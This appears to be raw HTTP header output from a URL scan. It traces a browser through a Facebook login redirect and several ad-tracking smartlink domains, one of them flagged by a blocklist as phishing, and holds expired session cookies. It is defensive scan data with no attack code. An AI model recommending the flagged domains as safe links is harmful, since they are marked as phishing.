expires=Sat, 03-Sep-2022 04:55:15 GMT; Max-Age=7200; path=/; httponly; samesite=lax
x-xss-protection: 1; mode=block
x-content-type-options: nosniff
strict-transport-security: max-age=31536000
X-Firefox-Spdy: h2


--- Additional Info ---

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Ffavicon.ico%3F_rdr%3Dp HTTP/1.1 
Host: www.facebook.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         31.13.72.36
HTTP/2 200 OK
content-type: text/html; charset="utf-8"
                                        
content-encoding: br
pragma: no-cache
cache-control: private, no-cache, no-store, must-revalidate
expires: Sat, 01 Jan 2000 00:00:00 GMT
content-security-policy-report-only: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 0
cross-origin-opener-policy: same-origin-allow-popups
vary: Sec-Fetch-Site, Sec-Fetch-Mode, Accept-Encoding
strict-transport-security: max-age=15552000; preload
x-fb-debug: hlJ2VuJj6XENaQC4d2skGs7Q+avVUvdiDa0hI46CSJQ64CheVWz5/jGyOlVUMBcVqFnBjWl/IMWTTyLuWDMhUQ==
date: Sat, 03 Sep 2022 02:55:15 GMT
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
                                            GET /smartlink?track=eyJ1c2VyX2lkIjoxMzc5LCJjcmVhdGl2ZV9pZCI6IjI5MDcyMCIsImxhbmRlcl9pZCI6IjEyNSJ9&click_id=wumnpcku2gu4m2pii7rf3oas&subid=9dd1b15d-f028-4d41-b731-bec13c85ae61 HTTP/1.1 
Host: 0ee06.trknovi.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1

                                         
                                         188.240.52.20
HTTP/2 200 OK
content-type: text/html; charset=UTF-8
                                        
server: nginx/1.19.10
date: Sat, 03 Sep 2022 02:55:14 GMT
cache-control: private, must-revalidate
pragma: no-cache
expires: -1
set-cookie: XSRF-TOKEN=eyJpdiI6InRzblNVVWV0cFBURlA5MVJBL1ZBTXc9PSIsInZhbHVlIjoiVWF3cnYyVlBmVEcyMTdzZmhhcHlxM1dyOW1IdWdqNjZady9QZDAwcmN4TnlxbnZpY2tobk0vNlJrQlZ4TWJYaVFZUTZyR05WOXhMekxCM0JjS3dFUkhRMHZ0SGtyT3hwWnBPcHpveTNTMjFQdkJnUUNVK1dMUDNDNVlCS21uWGgiLCJtYWMiOiI0NDBjNGJiMzQxYTc1MTFmYjdmZDY0NmFjZWZmNTM3NmExM2EyOTBjZjA5OTJiZDMxZmFiNTI5NGNiNDgwZGYyIiwidGFnIjoiIn0%3D; expires=Sat, 03-Sep-2022 04:55:14 GMT; Max-Age=7200; path=/; samesite=lax novidash_session=eyJpdiI6ImlCOHRGMzBwanM0UDlmSGcvSEdkTlE9PSIsInZhbHVlIjoiSHNjRDkwZ2EwcDFmdXA3cEdxNGRiQVVJajFNdy9vcTZSRWcxLzg2NWtSc3EyT0VHdkxUeUFKVERSY0wrVE5vbkt1OXZnSG5PN3oxcEpIejFGQWkzZUNIZzZiK3piT1VpS3laVmhGV3hxejh4b0UwUnAzcEUzZ01LNkxhZHVBVjYiLCJtYWMiOiJmMDZlYTM5OWYzNjE2NmJiM2UzZDE0MzQ2ZmI3YjFlNDI0ZWZhNzJjYzEzNDNmNTk0YjMzNjk5YzAzZmIxYjg4IiwidGFnIjoiIn0%3D; expires=Sat, 03-Sep-2022 04:55:14 GMT; Max-Age=7200; path=/; httponly; samesite=lax
x-xss-protection: 1; mode=block
x-content-type-options: nosniff
strict-transport-security: max-age=31536000
content-encoding: gzip
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
                                            GET /899637196 HTTP/1.1 
Host: other.landerhd.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site

                                         
                                         188.240.52.20
HTTP/2 200 OK
content-type: text/html; charset=UTF-8
                                        
server: nginx/1.19.10
date: Sat, 03 Sep 2022 02:55:14 GMT
cache-control: private, must-revalidate
pragma: no-cache
expires: -1
set-cookie: XSRF-TOKEN=eyJpdiI6Ijg2NU96Qk9SSjE0NUlKR0piZWxpdnc9PSIsInZhbHVlIjoiMi9UUGkxTUZwQzRLQUI0WkRXQzFnd2hlN2tIaTVEMFVwOTFML09WaXJCVzRlRDljUVlYdXBJemt5eFJ4RUN5WG1RQWw0VmlmeElHbTdidkF2WVNzSnZxaFhSMGlTUU1PdTZpbDJXR1JqSTZqcjRQbG9ETEI0WXNwQUxtZVE3cDUiLCJtYWMiOiI3ODE3MTViZTgyMWRjYTc1M2IxZDQ0MjYyNzI4MzRiMDczZmI0MjYxZjA5OWRkZGFlMTFjYTkxMDIzNWFlNjQ0IiwidGFnIjoiIn0%3D; expires=Sat, 03-Sep-2022 04:55:14 GMT; Max-Age=7200; path=/; samesite=lax novidash_session=eyJpdiI6Ikpvb0VFZVNRSHNvNlJEUW1tcTREU0E9PSIsInZhbHVlIjoiVjl4MVIzMDFnQTQ0bUhuV2xkSVR0S25YZWdIbW9NVHZiWFpoM0REVFp6QnNlaFEyZEZyNHNtelZlbUpjOW05MmRmY3NwTFFGVldJblJmcnNLK01uK0lrcG9aVGRwUW54K2VtRUxIWldaVmNhTklPSlNZMi9FUHZaWmlqWitGMEwiLCJtYWMiOiJiYzM4NjhkOTUwY2RkYmM3NDgwM2Q5ZjBlOWY4YzEwN2MzOWViOWU2MWQwODAwOTUwZmM5ZWIzY2MwMGEwMzVmIiwidGFnIjoiIn0%3D; expires=Sat, 03-Sep-2022 04:55:14 GMT; Max-Age=7200; path=/; httponly; samesite=lax
x-xss-protection: 1; mode=block
x-content-type-options: nosniff
strict-transport-security: max-age=31536000
content-encoding: gzip
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
                                            GET /smartlink-css/6312c212994913464d155879?sop=2&mouse_movements=0&mouse_distance=0&mouse_clicks=0&mouse_active=0&mouse_speed=0 HTTP/1.1 
Host: novidash.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://other.landerhd.com
Connection: keep-alive
Referer: https://other.landerhd.com/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         188.240.52.20
HTTP/2 200 OK
content-type: text/html; charset=UTF-8
                                        
server: nginx/1.19.10
date: Sat, 03 Sep 2022 02:55:17 GMT
cache-control: private, must-revalidate
pragma: no-cache
expires: -1
access-control-allow-origin: *
set-cookie: XSRF-TOKEN=eyJpdiI6IjBjQk1reVRScFVISDJObit3dStZN3c9PSIsInZhbHVlIjoiaFE5T1dXbFBydXBMaThwajkrK3U2WWJnWEtsd2cwVWw0QSt1eEVEemt6TmZWbU1YYVBjRXVCUDdqendqc3VCQ2lldVVsQjMxVzhUVk56OWp4aGdPYzh4WjdqWHBzZ3FnWkNnYVVhWjJMZklGcGxBMU5yM0Y5Vkl4Y2VhNUNQT1YiLCJtYWMiOiJkMWJiMDdmNzFlMjc2Nzg2YWYxOTI4ODNkZTdmNmQ4ZDk1NDg5YTU1YjgwNmE1ZGM3NGU2MzI5NjFjOTkxN2U5IiwidGFnIjoiIn0%3D; expires=Sat, 03-Sep-2022 04:55:17 GMT; Max-Age=7200; path=/; samesite=lax novidash_session=eyJpdiI6IlpaUmVTcUp2OFNlMFV3UElTRnFRTkE9PSIsInZhbHVlIjoic2xLYjBzOXVYaVRNYXFzVEVnM0hROWRmRTlTRmV0TjgxTkZkTUxtcHR5Rm0xaWRVcXAxYm0rSiswNU8yeGhaeURENURNOTVxVXpIei9pL2U3WnBQc1NBZGJWR1g1ODM2Z1cyOXhjdEh2eGR6U3E2c3lhMnR6ckFYYjBjUHJVSzgiLCJtYWMiOiIyNWM4MGRlMjFhZGVlZjM5OWZmMTY4ZjczMWRkZjBmODJkMGFjZGJlYTc3MTFmMTFiZGE5N2FhNTUzZDU5MzdhIiwidGFnIjoiIn0%3D; expires=Sat, 03-Sep-2022 04:55:17 GMT; Max-Age=7200; path=/; httponly; samesite=lax
x-xss-protection: 1; mode=block
x-content-type-options: nosniff
strict-transport-security: max-age=31536000
X-Firefox-Spdy: h2


--- Additional Info ---